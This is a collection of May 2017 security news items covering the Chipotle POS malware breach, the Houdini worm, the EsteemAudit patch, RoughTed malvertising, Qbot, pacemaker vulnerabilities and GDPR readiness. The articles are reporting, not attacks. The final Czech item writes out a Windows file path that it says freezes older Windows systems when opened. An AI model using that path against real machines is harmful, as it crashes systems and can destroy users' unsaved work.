Nová stránka 3

Chipotle Mexican Grill Fast-food chain notified customers a PoS malware breach
27.5.2017 securityaffairs Virus

The Fast-food chain Chipotle notified users a security breach, hackers compromised its point of sale terminals to steal payment card data.
The Mexican Grill Fast-food chain Chipotle notified users a data breach, hackers infected its point of sale terminals to steal payment card data.

The malicious code infected systems in 47 states and Washington earlier this year from March 24 to April 18.

The list of affected Chipotle restaurants is available here.

“The investigation identified the operation of malware designed to access payment card data from cards used on point-of-sale (POS) devices at certain Chipotle restaurants between March 24, 2017 and April 18, 2017.” reads the data breach notification published by the company. “The malware searched for track data (which sometimes has cardholder name in addition to card number, expiration date, and internal verification code) read from the magnetic stripe of a payment card as it was being routed through the POS device. There is no indication that other customer information was affected.”

Chipotle data breach

The company highlighted that not all the locations were breached by hackers, you can check a specific location at the following address:

https://www.chipotle.com/security#security

Users who have paid at the compromised stores should stay vigilant on their bank accounts and check any transaction involving their payment card.

The company confirmed to have removed the malicious code from the infected systems.

“During the investigation we removed the malware, and we continue to work with cyber security firms to evaluate ways to enhance our security measures. In addition, we continue to support law enforcement’s investigation and are working with the payment card networks so that the banks that issue payment cards can be made aware and initiate heightened monitoring.” reads the statements.

PoS systems attacks are very common, this week Target, the US retail giant that suffered one of the most severe PoS system attacks, has entered a settlement with the US Attorneys General and it has agreed to pay $18.5 million over the 2013 data breach.

Experts tracked a German hacker behind the spreading of Houdini Worm on Pastebin
27.5.2017 securityaffairs Virus

Security experts at Recorded Future tracked a German hacker for the propagation of the Houdini worm through Pastebin sites.
A German hacker that goes online with the moniker Vicswors Baghdad is the responsible for the propagation of the Houdini malware on Pastebin sites.

According to the expert at Recorded Future, the same threat actor appears to be the author of an open source ransomware variant called MoWare H.F.D.

Experts at Recorded Future have observed three distinct spikes in malicious Visual Basic scripts posted on paste sites, in August, October, and in March 2017.

houdini worm paste bin

Most of the scripts are used to spread the Houdini worm, a threat that first appeared in 2013 and was updated in 2016.

“In early March 2017, we began to notice an increasing number of malicious VBScripts posted to paste sites. The majority of these VBScripts appeared to be Houdini. Houdini is a VBScript worm that first appeared in 2013 and was updated in 2016.” states the analysis published by Recorded Future. “The individual(s) reusing this Houdini VBScript are continually updating with new command and control servers. After further defining our search criteria, we isolated the Houdini scripts and quickly identified three distinct spikes around August, October, and March of this year.”

Recorded Future discovered 213 malicious posts to Pastebin sites, involving a single domain with 105 subdomains, the experts have found 190 hashes.

The domains and subdomains are from a dynamic DNS provider, the attribution was impossible because threat actors published the VBScript for the Houdini worm on guest accounts.

However, the experts were able to determine the name of the registrant for one domain, microsofit[.]net, it is “Mohammed Raad,” and the associated email is“vicsworsbaghdad@gmail.com,” from “Germany.”

Googling the above information, the researchers discovered a Facebook profile using the identical information. According to the profile, Mohammed Raad is a member of a German cell of Anonymous, it uses Vicswors Baghdad as an alias.

The researchers also highlighted that the Facebook profile also includes a recent conversation related to the MoWare H.F.D ransomware.

houdini worm paste bin

“The Facebook profile displays a recent conversation pertaining to an open source ransomware called “MoWare H.F.D”. It appears that they are studying, testing, and possibly configuring a ransomware.” continues the analysis.

“Upon further inspection of the screenshot posted on the “vicsworsbaghdad” Facebook profile, we noticed that the ransomware being configuring is an open source version available by commenting on the creator’s YouTube video. An account “Vicswors Baghdad” commented asking where he can find the file to download, to which the developer commented that they sent a private message. The account “Vicswors Baghdad” uses the same email “vicsworsbaghdad@gmail.com” as the registration of microsofit[.]net.”

Further details, including the threat actor profile, are available in the post published by Recorded Future.

Organizations Concerned About Medical Device Attacks: Study

27.5.2017 securityweek Cyber

Many manufacturers and healthcare delivery organizations (HDO) are concerned about medical device attacks, but only few have taken significant steps to address the threat, according to a study commissioned by electronic design automation solutions provider Synopsys.

The study, based on a survey of 550 individuals conducted by the Ponemon Institute, shows that 67 percent of medical device makers and 56 percent of HDOs believe an attack on the medical devices they build or use is likely to occur in the next 12 months.

In fact, roughly one-third of respondents said they were aware of cyber incidents that had a negative impact on patients, including inappropriate therapy or treatment delivery, ransomware attacks, denial-of-service (DoS) attacks, and hijacking of medical devices.

On the other hand, only 17 percent of device manufacturers and 15 percent of HDOs have taken significant steps to prevent attacks. Roughly 40 percent on both sides admitted that they haven’t done anything to prevent attacks.

Only 25 percent of device makers and 38 percent of HDOs are confident that the security mechanisms built inside devices can adequately protect patients and the clinicians who use these systems.

While mobile devices help clinicians be more efficient, approximately half of respondents believe that their use in hospitals and other healthcare organizations significantly increases security risks.

A majority of respondents believe securing medical devices is very difficult. The survey showed that many focus on security requirements instead of more efficient practices, such as security testing throughout the development lifecycle, code review, and dynamic testing.

The study shows that more than half of device manufacturers and HDOs blame the presence of vulnerable code on lack of quality assurance and testing procedures, while nearly 50 percent also blame the rush-to-release pressure on the development team, accidental coding errors, and lack of training on secure coding practices.

The study shows that 36 percent of manufacturers and 45 percent of HDOs do not test devices. Some of those that do test have admitted finding vulnerabilities and even malware.

While medical device manufacturers are most concerned about hacker attacks and the challenges posed by securing new medical technologies, service providers are more concerned about keeping up with regulatory requirements, and the medical industry’s lack of protection for patients and users.

When it comes to budget, a majority believe a serious hacking incident affecting medical devices would likely lead to a budget increase. A significant percentage of respondents also believes new regulations would also influence budget.

Budget influence factors

Researchers Release Patch for NSA-linked "EsteemAudit" Exploit

27.5.2017 securityweek BigBrothers
Security researchers at enSilo have released a patch to keep vulnerable systems protected from a recently released Windows exploit allegedly used by the National Security Agency (NSA)-linked Equation Group.

Dubbed EsteemAudit, this exploit targets a remote desktop protocol (RDP) bug and can be abused to move laterally within a compromised organization’s network, as well as to infect victims with ransomware or backdoors, or to exfiltrate sensitive information.

The exploit might not be as popular as the EternalBlue exploit, which fueled large infections such as WannaCry or Adylkuzz, but it could prove as devastating.

EsteemAudit was made public last month when the hacking group known as the Shadow Brokers decided to release a new set of exploits and tools allegedly stolen from the NSA-linked Equation Group last year. Soon after, Microsoft said the vulnerabilities had been patched in March.

The hackers initially put the tools up for auction, but decided to release some of them for free after failing to attract buyers. Last week, the Shadow Brokers announced plans to launch a subscription service and share more exploits to members for a monthly fee.

Unlike EternalBlue, which affects a variety of Windows versions, EsteemAudit only works on Windows XP and Windows Server 2003, which supposedly limits its overall impact. However, this also means that an official patch is unlikely to arrive from Microsoft, as it no longer offers support for these platform iterations.

Because of that, enSilo decided to release a persistent patch for these systems and keep users safe from attacks possibly leveraging the exploit. The decision was fueled by the fact that a large number of machines continue to use Windows XP and Server 2003, the researchers say.

“Upon login for each session, Windows will create a new instance of winlogon. The patch will be loaded into winlogon.exe (only if it is an RDP session) to perform in memory patching (hotpatching) of EsteemAudit. Any attempt to use EsteemAudit to infect the patched machine will inevitably fail,” enSilo explains.

Installing this patch, however, doesn’t render Windows XP or Server 2003 systems fully secure, as hundreds of other vulnerabilities impacting them still exist and will never be patched. This patch resolves only the vulnerability exploited by EsteemAudit and works on both x86 and x64 platform versions.

The patch is available for download on enSilo’s website and is installed by an installation program after accepting the terms of usage. Uninstallation is supported by signaling an event (which will remove the patch in memory) and unregistering the patch from loading into subsequent RDP sessions.

“The patch for Windows XP and Server 2003 supports silent installation and does not require a reboot, which helps users avoid the required downtime typically associated with patch installations. Upon patching, any attempt to use an EsteemAudit exploit to infect a patched machine will inevitably fail,” the researchers say.

Large Malvertising Campaign Delivers Array of Payloads

27.5.2017 securityweek Virus
A malvertising campaign that has been active for more than a year is using fingerprinting to target users with a variety of payloads, Malwarebytes security researchers warn.

Dubbed RoughTed, this large malvertising operation peaked in March 2017, with its domains accumulating over half a billion visits in the past 3 months alone. Unique to it is the fact that it has a broad scope, ranging from scams to exploit kits, and that it delivers payloads based on user’s operating system, browser, and geolocation.

The campaign also uses effective techniques to triage visitors and bypass ad-blockers, which explains the large success it has seen so far. RoughTed’s operators have been using the Amazon cloud infrastructure, particularly the Content Delivery Network (CDN) and multiple ad redirections from several ad exchanges, the security firm says.

With traffic coming from thousands of publishers, some of which are ranked in Alexa’s top 500 websites, the campaign blended in and made it more difficult to identify the source of malvertising, Malwarebytes’ Jérôme Segura reveals.

Upon initial detection, the campaign was redirecting to the Magnitude exploit kit, but started redirecting to the RIG exploit kit just days later. The researchers then identified the same pattern on a hundred other domains, most of which he says were purchased through registrar EvoPlus in small batches with a new .ru or .ua email address each time.

While analyzing the traffic for the RoughTed campaign, Segura discovered that the bulk of it was coming from video or file sharing sites closely intertwined with URL shorteners. These sites enjoy high traffic but have low standards when it comes to quality and safety of online advertising, Segura points out.

The campaign was also associated with an ad code script from advertising company Ad-Maven, which webmasters knowingly integrated into personal websites for monetization purposes. The script contains an algorithm to generate future Amazon S3 URLs, though buckets are created only for the next 3-5 days.

The code also stands out due to its fingerprinting functionality and the use of a technique called ‘canvas fingerprinting’. “The point is to profile users with great granularity and identify those that may be cheating the system by lying about their browser or geolocation,” the researcher explains.

What’s more, the redirections to RoughTed domains were found to happen even when ad-blockers such as Adblock Plus, uBlock origin or AdGuard were used. In an incident involving Google Chrome, the researcher found that the browser hijacking took place as soon as the user clicked anywhere on the first visited page.

“This malvertising campaign is quite diverse and no matter what your operating system or browser are, you will receive a payload of some kind. Perhaps this should be something for publishers to have a deep hard look at, knowing what they may be subjecting their visitors to if they decide to use those kinds of adverts,” the researcher says.

As part of the campaign, users were tricked with a fake Flash Player update that targets Mac, or with a bogus Java update for Windows, which instead is laced with adware. Bogus Chrome extensions are also part of it, leveraging the popularity of the browser, along with undesired redirections to iTunes/app store, tech support scams, or surveys and other scams.

The RoughTed campaign also redirected to exploit kits, mainly when it came to users in the US and Canada, but also those in the U.K., Italy, Spain, and Brazil. Used exploit kits included RIG, which in turn served the Ramnit banking Trojan, along with Magnitude, which eventually dropped the Cerber ransomware onto compromised systems.

G7 Demands Internet Giants Crack Down on Extremist Content

27.5.2017 securityweek BigBrothers
Taormina, Italy - The G7 nations on Friday demanded action from internet providers and social media firms against extremist content online, vowing to step up their fight against terrorism after the Manchester attack.

"The G7 calls for Communication Service Providers and social media companies to substantially increase their efforts to address terrorist content," Britain, the United States and their G7 partners said in a statement.

"We encourage industry to act urgently in developing and sharing new technology and tools to improve the automatic detection of content promoting incitement to violence, and we commit to supporting industry efforts in this vein including the proposed industry-led forum for combating online extremism," they said.

Elders at the Manchester mosque where the bomber sometimes worshipped have insisted that they preached a message of peace.

It has been suggested that he may well have been radicalized online by accessing content that is freely available from the likes of the Islamic State group.

"Make no mistake: the fight is moving from the battlefield to the internet," Prime Minister Theresa May told her G7 colleagues.

The G7 also vowed a collective effort to track down and prosecute foreign fighters dispersing from theaters of conflict such as Syria.

One prosecution was recently brought against such a fighter in Turkey, and Britain now wants help from local authorities for more prosecutions in Lebanon, Jordan and Iraq, a British government spokesperson said as the G7 countries met in Sicily.

The stepped-up cooperation comes amid fears that the Manchester bomber had been to Syria after visiting his parents' homeland of Libya.

"It is vital we do more to cooperate with our partners in the region to step up returns and prosecutions of foreign fighters," May said as she chaired a discussion on counter-terrorism in the Sicilian resort of Taormina.

"This means improving intelligence-sharing, evidence gathering and bolstering countries' police and legal processes."

European authorities are increasingly concerned about the threat posed by foreign fighters who went to join the Islamic State group but are now dispersing as the group comes under pressure on the battlefield.

According to a senior British government source, May urged the G7 countries to share police expertise and border security methods with countries where foreign fighters travel through or fight in.

Names and nationalities of foreign fighters should be shared to help their identification by different countries as they cross borders.

"When our allies find evidence, such as video or papers, of illegal activity involving foreign fighters, for example a Brit in a conflict zone, they should pass that to our authorities. It may help prosecute foreign fighters when they return," the source said.

Draft Hacking Back Bill Gets Modifications Prior to Imminent Introduction

26.5.2017 securityweek Hacking
Rep. Tom Graves (R-Ga.) has released an updated version (PDF) of his draft Active Cyber Defense Certainty (ACDC) Act, incorporating feedback from the business community, academia and cybersecurity policy experts. "I look forward to continuing the conversation and formally introducing ACDC in the next few weeks," he said yesterday.

The original discussion draft was released in March 2017.

ACDC is designed to amend the existing Computer Fraud and Abuse Act (CFAA). CFAA, enacted in 1986, currently prohibits individuals from taking any defensive actions other than preventative actions; that is, cyber defenders are only legally allowed to defend passively. ACDC would allow controlled 'active' defense -- something often called, somewhat misleadingly, 'hacking back' -- by excluding prosecution for the exempted actions under the CFAA.

The modifications now introduced are largely designed to tighten control and avoid collateral damage. For example, entities using active-defense techniques will need to report to the FBI. "A victim who uses an active cyber defense measure... must notify the FBI National Cyber Investigative Joint Task Force prior to using the measure."

Similarly, modifications make it clear that active defense restrictions against causing physical injury include financial injury; and provide additional safeguards for 'intermediate computers'. The latter term is defined as "a person or entity's computer that is not under the ownership or control of the attacker but has been used to launch or obscure the origin of the persistent cyber-attack."

These intermediate computers have always been considered the weak point in any form of hacking back -- it is not easy for anyone to be certain of the precise source of an attack, leading to the possibility that active-defense measures could be launched against an innocent target.

National Security Agency and Cyber Command head Admiral Mike Rogers is one of those with such concerns. "My concern is," he said during testimony before a House Armed Services subcommittee on Tuesday, "be leery of putting more gunfighters out in the street in the Wild West. As an individual tasked with protecting our networks, I'm thinking to myself -- we've got enough cyber actors out there already."

Perhaps in recognition of the inherent difficulties in such an Act, Graves has also introduced a sunset clause: "The exclusion from prosecution created by this Act shall expire 2 years after the date of enactment of this Act."

"Although ACDC allows a more active role in cyber defense," says an associated statement released yesterday, "it protects privacy rights by prohibiting vigilantism, forbidding physical damage or destruction of information on anyone else's computer, and preventing collateral damage by constraining the types of actions that would be considered active defense."

Survey Shows Disparity in GDPR Preparedness and Concerns

26.5.2017 securityweek Privacy
The European General Data Protection Regulation will take effect in exactly one year from today. It will affect any company that does business with the EU, whether that company is based in Europe or elsewhere (such as the US). While there have been many surveys indicating that affected firms are far from prepared, there are few that highlight the geographic disparity in readiness.

One Year Out: Views on GDP (PDF), conducted by Vanson Bourne for Varonis, is particularly detailed. It surveyed 500 IT decision makers in organizations with more than 1,000 employees in the US (200), the UK (100), Germany (100) and France (100). Unlike many such surveys, it includes the raw data, allowing readers to dig deep into areas of interest or concern.

Unsurprisingly, given other surveys, the headline result is that 75% of respondents "face serious challenges in being compliant with the EU GDPR by 25th May 2018." This result is consistent across all four nations; but those who strongly agree range from 15% in the UK (the lowest) to 25% (the highest) in the US.

The cause of this disparity may be found in senior management's attitude towards GDPR. Overall, 42% of companies do not view compliance by the deadline as a priority. Thirteen percent of firms 'strongly agree' with this -- but the detail ranges from just 6% in the UK to 19% in the US (France and Germany are equal at 10%).

It is tempting to suggest that this is influenced by history: the UK regulator has traditionally been 'business-friendly', allowing companies to be more relaxed towards data protection than counterparts in France and Germany. US companies (apart from the major tech industries such as Google, Facebook and Microsoft), have little experience of European regulators.

But while the survey may indicate a lack of urgency at the management level, the respondents themselves indicate serious concern over the potential effect of GDPR. Overall, 75% of respondents believe that fines imposed for breaching regulations could cripple some organizations. Here, US concerns (81%) are above average, with France being the least concerned at 64%. It would appear that US practitioners are more concerned about GDPR than are their managers.

The survey also provides detail on what aspects of GDPR are most concerning. Not surprisingly, the erasure right (the right-to-be-forgotten) in Article 17 tops the list at 55% overall. Somewhat surprisingly given the apparent link between this and the American constitutional right to freedom of speech, the US respondents were the least concerned at 48%. Equally surprising, UK concern was by far the highest at 71%.

The second biggest concern is the requirement for processing activities, contained in Article 30; that is, visibility into and control over who has access to the data. Overall concern was steady at 52%, with regional variations limited to the lowest at 50% (UK) and the highest at 53% (US).

"What's most worrying about the findings," comments Matt Lock, director of sales engineers at Varonis, "is that one in four organizations doesn't have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year's time. If they don't have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.”

The concern showing the greatest disparity is over data protection by design (Article 25). The least concern comes from France at 35%, with the highest from the US at 55% (this is the highest of all concerns for the US respondents). It seems to reflect a general concern that GDPR might impinge on innovation -- with the highest concern coming from perhaps the most entrepreneurial nation.

It would be wrong, however, to think that the respondents have only negative thoughts and worries about GDPR. Thirty-six percent of respondents believe it will be very beneficial for both consumers and organizations. This, however, ranges from a very low 12% in the UK to an encouraging 47% in the US. In purely business terms, 57% of UK respondents believe it will prove troublesome for organizations, while only 36% of US respondents think the same.

The top benefit for private citizens is that their personal data will be better protected (54%). The UK (61%) and the US (59%) lead France (45%) and Germany (47%) in this. The order is reversed, however, over whether GDPR will make it less likely that PII will be passed to third parties. The UK (24%) and the US (32%) are behind both France (35%) and Germany (36%). Confirming these views, very few respondents could see no benefits from GDPR -- and most of those seem to be in the UK (11%). Only 5% of US organizations hold a similar view.

A particularly interesting section of the report deals with expected outcomes from the GDPR, with wide variations on which regulator is expected to be the most stringent. Overall, Germany tops the list at 76%, with German respondents in the lead at 85%. The UK is second overall at 57% -- which could be surprising given the UK regulator's soft historical approach and the UK government's insistence that it will implement GDPR in as business-friendly manner as possible. This view is distorted, however, by the UK and US respondents' score at 76% each. France (35%) and Germany (24%) are far less confident that the UK regulator will be rigorous.

Ninety-two percent of respondents suspect a particular industry will be singled out as an example in the event of a breach. Banking is seen as the most likely at 26% overall. This figure is distorted by the UK response at 52%. Both France and Germany individually believe that any example will more likely come from the technology and telecommunications industry.

A high number of respondents (82%) also believe that a particular country will be singled out if one of their organizations is in breach of GDPR. The overall favorite is the UK at 23% -- but this is distorted by the UK respondents (48%) who are perhaps concerned with the after effects of Brexit. Noticeably, only 2% of French and 11% of German respondents have a similar view.

Nevertheless, 68% of respondents believe that a UK company (as opposed to the UK in general) will be singled out and punished because of Brexit. This belief is most strong in the US (77%) and the UK (70%), and less so, but still high, in France (58%) and Germany (57%).

What this survey shows above all is that while there is a general lack of preparedness for GDPR among most organizations, specific concerns and expectations can vary widely between the different nations. The level of detail provided goes far beyond many similar surveys, and allows individual readers to dig deeper into specific areas. The value in this is that by evaluating other countries' and organizations' concerns, individual readers can rate their own preparedness.

Endpoint Security Firm Tanium Raises $100 Million

26.5.2017 securityweek Security
Emeryville, CA-based endpoint security and systems management firm Tanium announced on Thursday that it has raised $100 million through the sale of common stock.

The latest funding round was led by TPG Growth and it brought in a new investor. The $100 million raised through the issuance of common stock – previous funding rounds offered only preferred stock – brings the company’s value to $3.75 billion.

Part of the proceeds have been used to repurchase shares from David Hindawi, co-founder and executive chairman of Tanium, to allow him to fund his charity projects. The rest will be used to provide liquidity to early employees and investors, and for general corporate purposes.

Tanium raises $100 million

With this funding round, Tanium has raised a total of $407 million. The company reported a revenue growth of more than 100% last year, and it claims to have brought on board nearly 100 new enterprise customers. Clients include U.S. government agencies, 12 of the top 15 banks, and six of the top 10 retailers.

The company’s plans for the future include expansion in the EMEA and APAC regions, establishing a strong presence in the media and manufacturing sectors, further investment into IT operations products and modules, and growth in existing industries.

“Tanium is unique in our industry. In contrast to the cybersecurity-only companies, we provide an endpoint platform that allows communication for massive numbers of assets in a way enterprises have never had before, which is useful across not only security but also operations issues in IT,” said Tanium CEO Orion Hindawi.

“Because of that breadth of offering, our investors see Tanium having longevity and potential that exceeds the typical cybersecurity landscape, and we will work hard to continue proving them right by driving our platform further into both security and operations with each passing quarter,” he added.

Last month, Hindawi published an open letter addressing accusations that the company exposed a California hospital’s network during sales demos, and reports of a toxic staff relations culture.

Russia's Disinformation Efforts Hit 39 Countries: Researchers

26.5.2017 securityweek BigBrothers
Russia's campaign of cyberespionage and disinformation has targeted hundreds of individuals and organizations from at least 39 countries along with the United Nations and NATO, researchers said Thursday.

A report by the Citizen Lab at the University of Toronto revealed the existence of "a major disinformation and cyber espionage campaign with hundreds of targets in government, industry, military and civil society," lead researcher Ronald Deibert said.

The findings suggest that the cyber attacks on the 2016 presidential campaign of Hillary Clinton -- which US intelligence officials have attributed to Russia -- were just the tip of the iceberg.

Citizen Lab researchers said the espionage has targeted not only government, military and industry targets, but also journalists, academics, opposition figures, and activists,

Notable targets, according to the report, have included a former Russian prime minister, former high-ranking US officials, members of cabinets from Europe and Eurasia, ambassadors, high ranking military officers and chief executives of energy companies.

In a blog post, Deibert said the Russian-directed campaign follows a pattern of "phishing" attacks to obtain credentials of targets, and carefully "tainted" leaks that mix real and false information to create confusion around the true facts.

"Russia has a long history of experience with what is known as 'dezinformatsiya,' going back even to Soviet times," Deibert said.

"Tainted leaks, such as those analyzed in our report, present complex challenges to the public. Fake information scattered amongst genuine materials -- 'falsehoods in a forest of facts'... is very difficult to distinguish and counter, especially when it is presented as a salacious 'leak' integrated with what otherwise would be private information."

Deibert said the researchers had no "smoking gun" that links the campaign to a particular government agency but added that "our report nonetheless provides clear evidence of overlap with what has been publicly reported by numerous industry and government reports about Russian cyber espionage."

Citizen Lab said one of the targets was US journalist David Satter, who has written extensively on corruption in Russia.

Satter's stolen e-mails were "selectively modified," and then "leaked" to give the false impression that he was part of a CIA-backed plot to discredit Russian President Vladimir Putin, the report said.

Similar leak campaigns targeted officials from Afghanistan, Armenia, Austria, Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia, Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam, according to the report.

UN officials and military personnel from more than a dozen countries were also targets, Citizen Lab said.

"Our hope is that in studying closely and publishing the details of such tainted leak operations, our report will help us better understand how to recognize and mitigate them," Deibert said.

Thousands of Third-Party Library Flaws Put Pacemakers at Risk

26.5.2017 securityweek Vulnerebility
Researchers have conducted a detailed analysis of pacemaker systems from four major vendors and discovered many potentially serious vulnerabilities.

The fact that implantable cardiac devices such as pacemakers and defibrillators are vulnerable to hacker attacks has been known for years, and while steps have been taken to address issues, security experts still report finding flaws in these products.

WhiteScope, a company founded by Billy Rios, one of the first security researchers to analyze medical devices, recently conducted an analysis of the implantable cardiac device ecosystem architecture and implementation interdependencies, with a focus on pacemakers.

Pacemaker vulnerabilities

The analysis covered home monitoring systems, implantable devices, pacemaker programmers, and the patient support networks of four vendors. Researchers investigated each type of device and the communications between them.

Tests conducted on devices acquired from eBay showed that reverse engineering their firmware is made easy by the fact that many of them use commercial, off-the-shelf microprocessors.

In the case of home monitoring devices, researchers discovered data sheets publicly available on the Internet, allowing attackers to determine how they work and how they can be manipulated. Firmware reverse engineering is also made easy by the lack of packing, obfuscation and encryption.

Debugging functionality present in implanted devices also exposes firmware. Malicious actors could leverage these features to gain privileged access to home monitoring devices and the pacemaker programmers used by physicians to diagnose and program the actual cardiac devices.

WhiteScope has analyzed four pacemaker programmers and found that they use more than 300 third-party libraries. Of these components, 174 are known to have a total of more than 8,000 vulnerabilities.

“Despite efforts from the FDA to streamline routine cybersecurity updates, all programmers we examined had outdated software with known vulnerabilities,” Rios said in a blog post. “We believe that this statistic shows that the pacemaker ecosystem has some serious challenges when it comes to keeping systems up-to-date. No one vendor really stood out as having a better/worse update story when compared to their competitors.”

In some cases, researchers found unencrypted patient data stored on the programmers, including SSNs, names, phone numbers and medical information. Since these programmers typically use removable storage drives, it’s easy for a local attacker to mount the drive and extract the entire file system.

Another potential problem is the fact that programmers do not require any type of authentication for programming implantable cardiac devices.

The list of security holes found by experts in home monitoring devices includes the failure to map the firmware to protected memory, firmware updates not digitally signed or protected against man-in-the-middle (MitM) attacks, hardcoded credentials, unsecured external USB connections, and the usage of universal authentication tokens for pairing with the implanted device.

The vendors have not been named and the details of the vulnerabilities found by WhiteScope have not been disclosed to the public, but they have been reported to ICS-CERT, which will likely alert affected companies.

Nigerians Sentenced to Prison in U.S. Over Massive Fraud Scheme

26.5.2017 securityweek Crime
Three Nigerian nationals have been handed prison sentences totaling 235 years by a U.S. court for their role in a massive international online scheme that involved romance scams, identity theft, fraud and money laundering.

The suspects, extradited to the United States from South Africa in July 2015, are Oladimeji Seun Ayelotan, 30, who was sentenced to 95 years in prison, Rasaq Aderoju Raheem, 31, who was sentenced to 115 years, and Femi Alexander Mewase, 45, who received a 25-year sentence.

They were found guilty in early 2017 of committing mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property. Two of them were also found guilty of conspiracy to commit bank fraud and money laundering.

U.S. authorities have charged 21 individuals in this case, including from Nigeria, South Africa, Wisconsin, California and New York. Eleven members of the conspiracy have been sentenced, including Teslim Olarewaju Kiriji, a 30-year-old Nigerian man believed to be one of the leaders of the conspiracy. Kiriji was sentenced to 20 years in prison, while the others received 10 years or less. Many of the remaining suspects have already pleaded guilty to various charges.

According to the Department of Justice, the defendants have been involved in Internet scams since at least 2001, with intended losses totaling tens of millions of dollars.

The scheme often started with a romance scam targeting U.S. citizens, who were tricked into believing that they were in a romantic relationship with a persona made up by the scammers.

Once they gained the victim’s trust, the perpetrators asked them to send money or help carry out various activities, such as laundering money via Western Union and MoneyGram, cashing counterfeit checks, and reshipping items purchased with stolen credit cards. The scammers also used stolen personal information to take control of bank accounts.

Authorities have published a list of email addresses and names used in this operation, urging other potential victims to come forward.

Qbot Infects Thousands in New Campaign

26.5.2017 securityweek BotNet
A recent distribution campaign resulted in thousands of machines being infected with the Qbot malware, Cylance security researchers warn.

Qbot, which is also known as Qakbot or Quakbot, has been around since 2009, but multiple layers of obfuscation, server-side polymorphism and periodic improvements allow it to remain a persistent threat.

The malware is known for its credential stealing functionality and the ability to spread through network shares, but also includes backdoor capabilities. For two weeks in February last year, the threat managed to ensnare over 50,000 computers worldwide into a botnet. In July, a SentinelOne report on the Furtim-related SFG malware tied Qbot to a fast-flux proxy-based network called Dark Cloud or Fluxxy.

What’s unclear regarding the newly observed Qbot outbreak is how the malware managed to infect such a large number of machines in a short period of time. Most probably, Cylance says, updated exploit kits helped with the distribution.

The core functionality of Qbot has remained fairly consistent over the years, and the polymorphic nature of the threat helped it evade detection. Focusing on this aspect allowed the researchers to discover how often the executable code is modified.

The same as with previously observed samples, the malware continues to configure a scheduled task to request updates, with one command set to run on a weekly basis. The payload received from the server is encrypted, and “the first 20 bytes serve as the RC4 key to decrypt the data,” the security researchers say.

By creating a script to send HTTP requests to each of the three URLs the malware itself receives updates from, the security researchers discovered that files with a unique hash would be supplied every 10 minutes. They also managed to collect a total of 140 unique files supplied by the server over a period of 24 hours.

“All 141 downloaded files were 32-bit Windows executables. Across the 141 files, all have unique compile timestamps, and the earliest one occurred on May 15, 2017,” the researchers say.

Analyzing two files with the same import hash but with different file hashes revealed that, of nine PE sections each of them contains (.text, .code, .rdata, .data, .CRT, .exp, .code (again), .rsc, and .reloc), all section hashes match except those for .text, .rdata, and .data.

Different .text sections could reveal a change in executable code, and initial analysis revealed that all 27 functions identified matched 100%. Following deobfuscation, however, the security researchers discovered that nine functions had received some changes, albeit the overall Qbot functionality remained the same.

“Qakbot continues to be a significant threat due to its credential collection capabilities and polymorphic features. Unhindered, this malware family can rapidly propagate through network shares and create an enterprise-wide incident,” Cylance notes.

In an emailed comment to SecurityWeek, Michael Patterson, CEO of Plixer, pointed out that there is no shortage of vulnerabilities that malicious applications can exploit and that threats will continue to evolve. Thus, defense systems should adapt to ensure more efficient detection.

“Qakbot’s dynamic polymorphic abilities make it particularly evasive to antivirus systems. This means the virus can more easily maintain its presence without being detected," Patterson said. "It does however need to communicate on the network in order to carry out its dastardly deeds. In the case of Qakbot, it uses HTTPS to communicate with command-and-control (C&C) and FTP to upload stolen data. Network Traffic Analytics can be leveraged against flow data to watch for this one-two punch combination especially where odd FQDNs patterns are detected.”

3 Nigerian Scammers Get 235-Years of Total Jail Sentence in U.S.
26.5.2017 thehackernews Crime
You may have heard of hilarious Nigerian scams. My all time favourite is this one:
A Nigerian astronaut has been trapped in space for the past 25 years and needs $3 million to get back to Earth, Can you help?
Moreover, Nigerians are also good at promising true love and happiness.
But You know, Love hurts.
Those looking for true love and happiness lost tens of millions of dollars over the Nigerian dating and romance scams.
These criminals spend their whole day trolling the online dating sites for contact emails and then send off hundreds of thousands of fraudulent emails awaiting the victim's response.
A US federal district court in Mississippi has sentenced such three Nigerian scammers to a collective 235 years in prison for their roles in a large-scale international fraud network that duped people out of tens of millions of dollars.
The three Nigerian nationals were part of a 21-member gang of cyber criminals, of which six, including Ayelotan, Raheem, and Mewase, were extradited from South Africa to the Southern District of Mississippi in July 2015 to face charges in the case.
Oladimeji Seun Ayelotan, 30, faces up to 95 years in prison
Rasaq Aderoju Raheem, 31, faces up to 115 years in prison
Femi Alexander Mewase, 45, faces up to 25 years in prison
A federal jury found all of them guilty of offenses involving mail fraud, wire fraud, credit card fraud, identity theft, and theft of government property, the US Department of Justice announced Thursday.
Also, Ayelotan and Raheem were found guilty of conspiracies to commit bank fraud and money laundering, which is why they have been given longer prison sentences.
Until now, the justice department has charged a total of 21 suspects in this case: 12 defendants have already pleaded guilty to charges related to the conspiracy while 11 have been sentenced to date.
The gang has been operating since 2001 and ran a variety of online scams, including romance scams, where the criminals used the false identity of love-struck girlfriends on a dating site to establish a romantic relationship with unsuspecting victims.
Once the gang members gained the victim's trust and affection, they would convince them to carry out their money laundering schemes and launder money from other rackets via MoneyGrams and Western Union, or resend electronics and other goods bought with stolen credit cards to countries where they could be sold for a profit.
The gang members were arrested by South African police in a joint operation with U.S. Immigration and Customs Enforcement's Homeland Security Investigations (HSI) and the U.S. Postal Inspection Service in December 2015.
However, Nigerian scams will never die, and you could be their next victim.

Windows Vista až 8.1 obsahují hloupou chybu. Po kliknutí na odkaz systém zamrzne
26.5.2017 CNEWS.CZ Zranitelnosti

Na webu habrahabr.ru autor upozorňuje na nepříjemnou chybu ve Windows Vista a novějších (mimo Windows 10), respektive jejich ovladačích souborového systému NTFS. V NTFS je v kořenovém adresáři skrytý soubor s názvem $MFT, který ukládá informace o všech souborech, složkách a jejich metadatech. Windows se stará o to, aby k němu nikdo neměl přístup.

Pokud se ale pokusíte otevřít neexistující soubor ve smyšleném adresáři $MFT (například C:\$MFT\ahoj), soubor $MFT se zamkne, což zablokuje všechny souborové operace. Aplikace a operační systém nakonec zamrznou. Pomůže jen restart.

$Windows spadl při pokusu o čtení souboru c:\$MFT\ahoj$
Windows spadl při pokusu o čtení souboru c:\$MFT\ahoj
